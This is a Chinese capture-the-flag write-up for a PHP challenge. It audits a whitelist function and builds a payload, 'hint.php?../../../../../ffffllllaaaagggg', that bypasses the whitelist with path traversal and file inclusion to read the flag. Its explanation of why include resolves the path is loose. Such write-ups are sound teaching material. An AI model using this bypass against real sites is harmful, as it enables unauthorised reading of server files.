拿到题,发现是一张图,查看源代码发现了被注释掉的提示
<!-- source.php-->
step 1 在url传参看看这个文件,发现了这道题的源码
step 2 开始审计代码,分析关键函数
-
//mb_strpos($haystack,$needle,$offset,$encoding):int|false 返回要查找的字符串在另一个字符串中首次出现的位置
-
$ haystack:要被检查的字符串。
-
$ needle:要搜索的字符串。
-
$offset 可选:用于定义从何处开始搜索字符串,即搜索位置的偏移。如果没有提供该参数,将会使用 0。负数的 offset 会从字符串尾部开始统计。
-
$encoding:可选。用于通过使用定义编码mb_internal_encoding()。如果省略或是
null,则使用内部字符编码。
-
-
//mb_substr($str,$start,$length,$encoding) 中文截取函数:函数返回字符串的一部分。
-
$str:必需。从该 string 中提取子字符串。
-
$start:必需。规定在字符串的何处开始。
-
正数 - 在字符串的指定位置开始
-
负数 - 在从字符串结尾的指定位置开始
-
0 - 在字符串中的第一个字符处开始
-
-
$length:可选。规定要返回的字符串长度。默认是直到字符串的结尾。
-
$encoding:网页编码,如utf-8,GB2312,GBK
-
源码中出现了:hint.php
step 3 url传参查看hint.php,发现以下文字
flag not here, and flag in ffffllllaaaagggg
即获得了flag文件名。
step 4 继续分析代码
<?php
highlight_file(__FILE__);
class emmm
//定义了一个名为emmm的类,在该类中有一个静态方法checkFile用于检查要包含的文件是否在白名单中,白名单是一个关联数组$whitelist,其中包含了允许包含的文件的键值对。在代码中,允许包含的文件有"source"=>"source.php"和"hint"=>"hint.php"。
{
public static function checkFile(&$page)
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
//第①次检查:checkFile方法检查传入的$page参数是否为字符串类型,如果不是或者未设置,将输出"you can't see it"并返回false。
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}
//第②次检查:检查传入的$page是否直接在白名单中存在,如果存在,返回true。
if (in_array($page, $whitelist)) {
return true;
}
//对$page参数进行一系列处理:首先使用mb_strpos函数找到$page中第一个问号的位置,然后使用mb_substr函数将问号之前的部分作为$_page进行处理。
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
//第③次检查:检查传入的$page是否直接在白名单中存在
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}
//将$_page进行URL解码,并重复之前的处理步骤,如果$_page在白名单中存在,返回true。如果上述条件都不满足,则输出"you can't see it"并返回false。
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>现在构造获取flag的语句:hint.php?../../../../../ffffllllaaaagggg
传入入checkFile函数要经历:①白名单验证 ②?过滤,过滤后就是hint.php ③白名单验证,返回为真,则达成条件进行包含得到flag
注:include函数有这么一个神奇的功能:以字符‘/’分隔(而且不计个数),若是在前面的字符串所代表的文件无法被PHP找到,则PHP会自动包含‘/’后面的文件——注意是最后一个‘/’。
这里的ffffllllaaaagggg是在hint.php中发现的,显然flag在这个文件里。其实文件名提示了我们要使用四层目录。有四层目录原理:source.php一般是在html目录下,往上是www、var、根目录,flag一般放在根目录下,这里还有个hint.php?或者source.php?,因此需要返回四层才能到根目录。
最终payload:
http://03b2cc85-7af4-439b-a06e-41da80ff6505.node3.buuoj.cn/index.php?file=hint.php?../../../../../ffffllllaaaagggg
注:若目标是根目录,则可以多穿几层,多穿无妨,少穿什么都没有
